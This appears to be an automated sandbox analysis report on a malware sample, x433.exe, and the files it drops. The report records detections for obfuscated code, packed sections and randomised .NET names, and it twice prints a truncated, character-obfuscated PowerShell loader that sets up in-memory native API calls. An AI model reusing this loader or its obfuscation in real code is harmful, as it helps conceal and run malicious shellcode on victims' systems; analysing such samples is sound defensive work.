Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+''
Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+''
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\x433.exe Code function: 0_2_00007FFD9B8900BD pushad ; iretd 0_2_00007FFD9B8900C1
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042E00A push ds; ret 1_2_0042E010
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042D0B0 push ds; ret 1_2_0042D0B1
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042F161 push 100077DBh; ret 1_2_0042F16B
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042D17B push cs; ret 1_2_0042D17C
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0042A34B push esi; iretd 1_2_0042A34C
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C329h; ret 1_2_0078BFF5
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C05Bh; ret 1_2_0078C0AF
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C416h; ret 1_2_0078C14F
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C6BEh; ret 1_2_0078C196
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C439h; ret 1_2_0078C1AC
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C599h; ret 1_2_0078C1E3
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C471h; ret 1_2_0078C1FB
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078BECFh; ret 1_2_0078C2FC
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C6CDh; ret 1_2_0078C390
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C2FFh; ret 1_2_0078C3AE
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C532h; ret 1_2_0078C45A
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C23Ch; ret 1_2_0078C597
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C08Dh; ret 1_2_0078C639
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C63Eh; ret 1_2_0078C67B
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078C198h; ret 1_2_0078C72A
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078CC2Ch; ret 1_2_0078CBE3
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078CBFEh; ret 1_2_0078CC1D
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_0078CBD0 push 0078CBE6h; ret 1_2_0078CC40
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 0078852Eh; ret 1_2_00787F3A
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 00788514h; ret 1_2_00787F66
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 00787E66h; ret 1_2_00788057
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 0078817Ah; ret 1_2_0078808B
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 007882E5h; ret 1_2_007880D9
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 0078826Ah; ret 1_2_0078819E
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00788550 push 0078849Ch; ret 1_2_007881E4
Source: x433.exe Static PE information: section name: .text entropy: 7.996675267651461
Source: x4Shellcode.exe.0.dr Static PE information: section name: .reloc entropy: 7.935386017883638
Source: x4host.exe.0.dr, xfwOCj1PDUkyxHJ.cs High entropy of concatenated method names: 'reqGHXI3G9wXso5', 'A3d5XBF2z5oVzdx', 'eM62vnBwLjHrGH0', 'a26UulBrBUIfuU8QpVdSBT5Y3', 'YnSkjpcwirB2DXcYUxXJJeLWI', 'ixkWVXbVwenR10cANu7dJKP7g', 'mYx4myPdes6v7IW2guHXEk0XM', 'USsEupRWAqKevrdsDYC30x7bu', '_6XZAKoQQgtBVHjhY9SsBP8xLt', 'vZHNXXe8F6yEh1yOyQfUiLBS9'
Source: x4host.exe.0.dr, hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.cs High entropy of concatenated method names: 'rWnjj3kE8i3rPLazoNf2St5AvccdZSJzR', 'sK0plnUhQjmhNNHfuS67N2yUQVQz4JiDZ', '_53WT8ngowxa7xthsXFFK8XeCjlHGk5Xmj', 'QD4jyzyxsnE0p6sTm96SrGfkWZdAoVoIk'
Source: x4host.exe.0.dr, oqXYL7IBPbaOrkCLfAY49RFSxlJrU3xfS77bdqqQ5SraRAZwMVptFdt.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_1pKE2dRjC82lv6NlWDIGaThfWYlfx4Vo4', 'mTqpVonBrB3IDzdoyAwNFf98atXrckdFf', 'PQAExrLV3pDxmbwvvKsu4AWoINLVIjAvI', 'XPSWdY17exp3KlEhvfjyng5wzdFRgqDIo'
Source: x4host.exe.0.dr, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs High entropy of concatenated method names: '_9KmzWj2mwalDOEBlyNP2RUmHGVJB0Z', 'oNXUpbPnIS5Rns1h69KZvbAfoRftvh', '_4jJu4Ia8z76oSV28Fbxqh2YxmM07G3', 'riqvGqOv1KqQr5kNYYUa2zhmrrkhvN', 'X1OxpIzLyhBl4TmbQKUQPdwhwgIGFJ', '_4kYSuRCBtXmtF4hZe7PcbiBTtCaVIg', '_45JikAg8ztoISYnTCTSKoerahn7Fh8', 'ftJZQZj46Ym8TmBooihlwWVW6mc6Qs', '_4mwLd6KxylnKnpZdEn9yb2RylClmkg', '_43NfPF5LUzaG2UCFRfZoKd43V2Y71J'
Source: x4host.exe.0.dr, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs High entropy of concatenated method names: 'E6lcacwk2Om4Jre8Zxlnx2uuwE3DSa', 'nEAfdyNliOQh4RbARZ4Mjrvp3lU9pw', 'H8c3AG7ObEKhDaQZQGLQNSaeOEF1MJ', 'CPxSbcTtcwCHCECL8MoBfAM4Ty8FRv', 'hbFWqMrhwX3iTTU', 'F2nHLZLu6dLkjSs', 'ozzr0SK9SyLkHPg', 'fIUf7QsKIygwHOo', '_6ZiCijBXyYwGoVC', 'dRhGyU4nmdwkQ0r'
Source: x4host.exe.0.dr, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs High entropy of concatenated method names: 'MuXxwXMdWpj7xWfZCFLL3ajC86y3HE', 'Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw', 'GDO8A3hX6t4WEqwjwDmkN9QX1di8dA', '_5r19egLavdE3pWQeJ25pnksK8bXRUF', 'hTZmQb61o9zj5OrkvKSmDe6Dn0YcwV', '_8ZLzAgSEWrGxT2bsbvXNRGhoqnDFts', 'COTHbvM7SEhrqKoXNPnzOeAV5YgdKV', 'Jz8IH3YoK4J9mxv3FUpFYpuTYdowWR', 'TBxbKfZSmgHZ9whZ3JbDGlqvOrEfna', 'MhOzbgjjU4AbicRDgrjOYm29se7kjw'
Source: x4host.exe.0.dr, 2GeJGBZ9s7f00k3MrIG6jUSZ27JzDpdLtJapZiFUDiIPvwDFAaMrisXFq17tsOrZFaIFb6cVJvf4N9MUGa9BFHlG.cs High entropy of concatenated method names: 'z1LzC6OirZQYgRajqkXBhte5gh9cv4LgGo3P1E2BJiHNBuOSiZJigIuiAkPFEDHCDVm4JYf9fwPOeIqIlhVif8jd', 'HCuQxWK61KjHlQFB3M0c4VHJAaL6HrtPZDHGB8NaNSZq6UkCD0sKzCXaSPWKon2xn7FWCpURH9umJNAI5wdFooOO', '_1WMMCf1RCWPIZjJAw5BK2pk7i0eukKPmEt4AeDUNcJ7JnLAVp1iAzXJuj91qkclSY3GnfmyL5AV9RiknQciWCej7', 'WakgiKHdUOu78VuIIKHZ8zGfJ34jFVbA1LIqQTZlGEjfUnSEU8p85cj0GZzXVZeDdbSRPUcLb8ClWbJM4VPmJ9iw', 'kYkGiTHBpkN4O55gQqmuNZa55cxWW239wKIErOIZL2UdORA3BMlJ9P29ysS8z4uHaz3WQqkwgNodyhcstP3NBaw9', 'AWq5zbRm4tFVd34LPvDKiiEM3AMmOYr01Yx2btbKOEixxWORG3DLG2pPf3JPv1GnhTWTIc3QTE7RxXDDqSUoq2sB', 'ErFN0wMw3jBZKG8RpL7gOeUUeMzXUQeuP98eTqAgR5mYRoGPnH45UPYSv89wOFV2THc6uSTjPClTbRCnZ7Qz6wKk', 'q8opKTgZkDsYXfN2NJLUEevH0yTqFb4r5IsoBmPy5iYX6ajuruWSA6kC40jSandPrrkT8GIPykkQciP4NE9snONl', 'UfyPTB51UMnUJ4m08aCQ5xJbrmtLG4', 'zoFPojQVB5ILw3JamQNmwW2ZDKvWyA'
Source: x4host.exe.0.dr, vthpzjkPbD10MqQvse8d9fgJdMuC69.cs High entropy of concatenated method names: '_4FWlZlOv9mJvgefZ0oZnm4oehhLgu7', 'lnELcVdQS1KjcheIGYrB4ncZtrtGJ1', 'khljFe8k3eynRCcPUrTtQcLDJSfYdW', '_3pHprr9Uje78hOKmIDBwm74LcLR0gf', 'Y5J6lR8AXCpHirkDqZHu1AxA9OvKJbnJTugtJarDfVGeTU8peTob1op3HF6Nhe5YT0xNJjLPbNs6oEbgQGPe4LnhRTvQboc6N', 'bhaqJNHS2LH8epigaJtBlgMA2LQbW4n33Lgwf215UT60eyD9EHmyNDEWkVlik8c6jEl3iOysXcy9cIlscLLrmBhYyTQgafHw7', 'TlCcWOPNdmYoiwcRNmDsu3nZpJt9JjHfl647IMjnHYXDgPBs9vDpl2W2Zi09X0tLuME6YggpUOZZKmc59tFSy73v8AaSjeH3L', '_0RTp1iMhbSwasiCO1wAvDGgmeICOBLbCdi0UHWmgt5R6ftDE92322bTynImnNZe0NJWfGFeRYjPkUaF2d2N2kyeiYXBZ0Pd2s', 'ezUslj75uOCTADP6qP5EUIYwDx51Bo18aSlvhYg0ygBxP6fectATG16mbwziR5jIer6tycwZJOVw5TpWpnGDNwIfVzn5lAWLE', 'K6HJdPff3bNq0gfmsoCxocbF6Eyi361PVuyR3ArlJfkLRsWX9RI9Q9SiBYnuSiLG69BuhvE23aOFXboZJNozy7lvQoyJGQ84q'
Source: x4host.exe.0.dr, KgvNpQFD1pgyslmvoLVzYtqStdU0vY.cs High entropy of concatenated method names: '_8OqKNdBpQOiP48byjobgpYdKjvomXU', 'bSMJ4wPTjULuRIGy20UVskepWllP8tk4XXKMa9hhWQ4xSP9EjJMUqTPO4upHSn5rtUuCwfq9Gr4oZSRYZE5uKPuqxQKdonuya', 'wKT6cqounpHYRYFCkj4gBtSbVwIDF60ELB01T92h8bh6mYlu0i92K6L8ZXsf4XHyaAi0s6qGfXrcIK6okzaEJXTR1NZBhKKJ3', 'FQKjPf2hqoC1UlXmUSQMOVlJtO41IdIgkPZql4wdu4YM059Qm8JumuCUvPqQvXel1aTrhIdZcx7JdoYlxAavrNAiKQ4Cqx3a6', 'p2o0lampFTBN00Sl2Ly0kao2KUg8HEgfgNWBsGWwrRNVRf3xcSm1prkmpTZ37cJnWU6TxDbV3JzbDLvYcTDQMtw0REG1BG3Eo'
Source: x4host.exe.0.dr, EnDrnZVI21QanoXDv7V6tpRAyEeGc3.cs High entropy of concatenated method names: 'OJnYUbLkwSxKjmU6fKV2Hlw1IQDrrJ', 'tvU9fWfrnnauFESq3CZMjJqgWzCcQiVr8uOuybtYGmaAmLPTrBRbSmpeagqUwJ0IALVMMAlEq32BxT15HJetiYKVXqlBwiRN1', 'k27RKeDihzBbcaefRpL4TKPMWxclxn8k5c0RxZP7mcnpWucKutGtmjKZrYx20HvHIzkMsxzKuui79OmMLiSyzphYgEiKf93jl', 'Kdk7fsQFZWfb1NTSDwX0JpPEu3wN1ciOsKyPwnWHaTkkzFYlgvY2wLJUeOMcOnyeSOxZT6WHdCzt3OQdLa8', 'ZNCH16SUBJBa1infvnuYgiLTJaADVvvCpDUyOhAylbPs8EBspiKDd2NBofvowFjy7xlhRV6MgZ2dosI75Nq'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, xfwOCj1PDUkyxHJ.cs High entropy of concatenated method names: 'reqGHXI3G9wXso5', 'A3d5XBF2z5oVzdx', 'eM62vnBwLjHrGH0', 'a26UulBrBUIfuU8QpVdSBT5Y3', 'YnSkjpcwirB2DXcYUxXJJeLWI', 'ixkWVXbVwenR10cANu7dJKP7g', 'mYx4myPdes6v7IW2guHXEk0XM', 'USsEupRWAqKevrdsDYC30x7bu', '_6XZAKoQQgtBVHjhY9SsBP8xLt', 'vZHNXXe8F6yEh1yOyQfUiLBS9'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, hOxzwpfm6coo0sFoeslkbZMZZb7K7qrd76lD9A2OOjokqoisweTmVdQnNUqdyCf5emVzmT0qOk8yGIDulWDAfZT1.cs High entropy of concatenated method names: 'rWnjj3kE8i3rPLazoNf2St5AvccdZSJzR', 'sK0plnUhQjmhNNHfuS67N2yUQVQz4JiDZ', '_53WT8ngowxa7xthsXFFK8XeCjlHGk5Xmj', 'QD4jyzyxsnE0p6sTm96SrGfkWZdAoVoIk'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, oqXYL7IBPbaOrkCLfAY49RFSxlJrU3xfS77bdqqQ5SraRAZwMVptFdt.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_1pKE2dRjC82lv6NlWDIGaThfWYlfx4Vo4', 'mTqpVonBrB3IDzdoyAwNFf98atXrckdFf', 'PQAExrLV3pDxmbwvvKsu4AWoINLVIjAvI', 'XPSWdY17exp3KlEhvfjyng5wzdFRgqDIo'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, ep6wttCf2TiLTQ7SU0ji7DL4Gw31u1.cs High entropy of concatenated method names: '_9KmzWj2mwalDOEBlyNP2RUmHGVJB0Z', 'oNXUpbPnIS5Rns1h69KZvbAfoRftvh', '_4jJu4Ia8z76oSV28Fbxqh2YxmM07G3', 'riqvGqOv1KqQr5kNYYUa2zhmrrkhvN', 'X1OxpIzLyhBl4TmbQKUQPdwhwgIGFJ', '_4kYSuRCBtXmtF4hZe7PcbiBTtCaVIg', '_45JikAg8ztoISYnTCTSKoerahn7Fh8', 'ftJZQZj46Ym8TmBooihlwWVW6mc6Qs', '_4mwLd6KxylnKnpZdEn9yb2RylClmkg', '_43NfPF5LUzaG2UCFRfZoKd43V2Y71J'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, etNX0TntxxQcULpBdpvLQMPzQQj7vk.cs High entropy of concatenated method names: 'E6lcacwk2Om4Jre8Zxlnx2uuwE3DSa', 'nEAfdyNliOQh4RbARZ4Mjrvp3lU9pw', 'H8c3AG7ObEKhDaQZQGLQNSaeOEF1MJ', 'CPxSbcTtcwCHCECL8MoBfAM4Ty8FRv', 'hbFWqMrhwX3iTTU', 'F2nHLZLu6dLkjSs', 'ozzr0SK9SyLkHPg', 'fIUf7QsKIygwHOo', '_6ZiCijBXyYwGoVC', 'dRhGyU4nmdwkQ0r'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, EndO8ud7oLHcucMOjPbPQqoqz2hrsI.cs High entropy of concatenated method names: 'MuXxwXMdWpj7xWfZCFLL3ajC86y3HE', 'Zqmy8YoOiD6vkJ4QUa6qotcMjyzvtw', 'GDO8A3hX6t4WEqwjwDmkN9QX1di8dA', '_5r19egLavdE3pWQeJ25pnksK8bXRUF', 'hTZmQb61o9zj5OrkvKSmDe6Dn0YcwV', '_8ZLzAgSEWrGxT2bsbvXNRGhoqnDFts', 'COTHbvM7SEhrqKoXNPnzOeAV5YgdKV', 'Jz8IH3YoK4J9mxv3FUpFYpuTYdowWR', 'TBxbKfZSmgHZ9whZ3JbDGlqvOrEfna', 'MhOzbgjjU4AbicRDgrjOYm29se7kjw'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, 2GeJGBZ9s7f00k3MrIG6jUSZ27JzDpdLtJapZiFUDiIPvwDFAaMrisXFq17tsOrZFaIFb6cVJvf4N9MUGa9BFHlG.cs High entropy of concatenated method names: 'z1LzC6OirZQYgRajqkXBhte5gh9cv4LgGo3P1E2BJiHNBuOSiZJigIuiAkPFEDHCDVm4JYf9fwPOeIqIlhVif8jd', 'HCuQxWK61KjHlQFB3M0c4VHJAaL6HrtPZDHGB8NaNSZq6UkCD0sKzCXaSPWKon2xn7FWCpURH9umJNAI5wdFooOO', '_1WMMCf1RCWPIZjJAw5BK2pk7i0eukKPmEt4AeDUNcJ7JnLAVp1iAzXJuj91qkclSY3GnfmyL5AV9RiknQciWCej7', 'WakgiKHdUOu78VuIIKHZ8zGfJ34jFVbA1LIqQTZlGEjfUnSEU8p85cj0GZzXVZeDdbSRPUcLb8ClWbJM4VPmJ9iw', 'kYkGiTHBpkN4O55gQqmuNZa55cxWW239wKIErOIZL2UdORA3BMlJ9P29ysS8z4uHaz3WQqkwgNodyhcstP3NBaw9', 'AWq5zbRm4tFVd34LPvDKiiEM3AMmOYr01Yx2btbKOEixxWORG3DLG2pPf3JPv1GnhTWTIc3QTE7RxXDDqSUoq2sB', 'ErFN0wMw3jBZKG8RpL7gOeUUeMzXUQeuP98eTqAgR5mYRoGPnH45UPYSv89wOFV2THc6uSTjPClTbRCnZ7Qz6wKk', 'q8opKTgZkDsYXfN2NJLUEevH0yTqFb4r5IsoBmPy5iYX6ajuruWSA6kC40jSandPrrkT8GIPykkQciP4NE9snONl', 'UfyPTB51UMnUJ4m08aCQ5xJbrmtLG4', 'zoFPojQVB5ILw3JamQNmwW2ZDKvWyA'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, vthpzjkPbD10MqQvse8d9fgJdMuC69.cs High entropy of concatenated method names: '_4FWlZlOv9mJvgefZ0oZnm4oehhLgu7', 'lnELcVdQS1KjcheIGYrB4ncZtrtGJ1', 'khljFe8k3eynRCcPUrTtQcLDJSfYdW', '_3pHprr9Uje78hOKmIDBwm74LcLR0gf', 'Y5J6lR8AXCpHirkDqZHu1AxA9OvKJbnJTugtJarDfVGeTU8peTob1op3HF6Nhe5YT0xNJjLPbNs6oEbgQGPe4LnhRTvQboc6N', 'bhaqJNHS2LH8epigaJtBlgMA2LQbW4n33Lgwf215UT60eyD9EHmyNDEWkVlik8c6jEl3iOysXcy9cIlscLLrmBhYyTQgafHw7', 'TlCcWOPNdmYoiwcRNmDsu3nZpJt9JjHfl647IMjnHYXDgPBs9vDpl2W2Zi09X0tLuME6YggpUOZZKmc59tFSy73v8AaSjeH3L', '_0RTp1iMhbSwasiCO1wAvDGgmeICOBLbCdi0UHWmgt5R6ftDE92322bTynImnNZe0NJWfGFeRYjPkUaF2d2N2kyeiYXBZ0Pd2s', 'ezUslj75uOCTADP6qP5EUIYwDx51Bo18aSlvhYg0ygBxP6fectATG16mbwziR5jIer6tycwZJOVw5TpWpnGDNwIfVzn5lAWLE', 'K6HJdPff3bNq0gfmsoCxocbF6Eyi361PVuyR3ArlJfkLRsWX9RI9Q9SiBYnuSiLG69BuhvE23aOFXboZJNozy7lvQoyJGQ84q'
Source: 0.2.x433.exe.29b77d8.1.raw.unpack, KgvNpQFD1pgyslmvoLVzYtqStdU0vY.cs High entropy of concatenated method names: '_8OqKNdBpQOiP48byjobgpYdKjvomXU', 'bSMJ4wPTjULuRIGy20UVskepWllP8tk4XXKMa9hhWQ4xSP9EjJMUqTPO4upHSn5rtUuCwfq9Gr4oZSRYZE5uKPuqxQKdonuya', 'wKT6cqounpHYRYFCkj4gBtSbVwIDF60ELB01T92h8bh6mYlu0i92K6L8ZXsf4XHyaAi0s6qGfXrcIK6okzaEJXTR1NZBhKKJ3', 'FQKjPf2hqoC1UlXmUSQMOVlJtO41IdIgkPZql4wdu4YM059Qm8JumuCUvPqQvXel1aTrhIdZcx7JdoYlxAavrNAiKQ4Cqx3a6', 'p2o0lampFTBN00Sl2Ly0kao2KUg8HEgfgNWBsGWwrRNVRf3xcSm1prkmpTZ37cJnWU6TxDbV3JzbDLvYcTDQMtw0REG1BG3Eo'
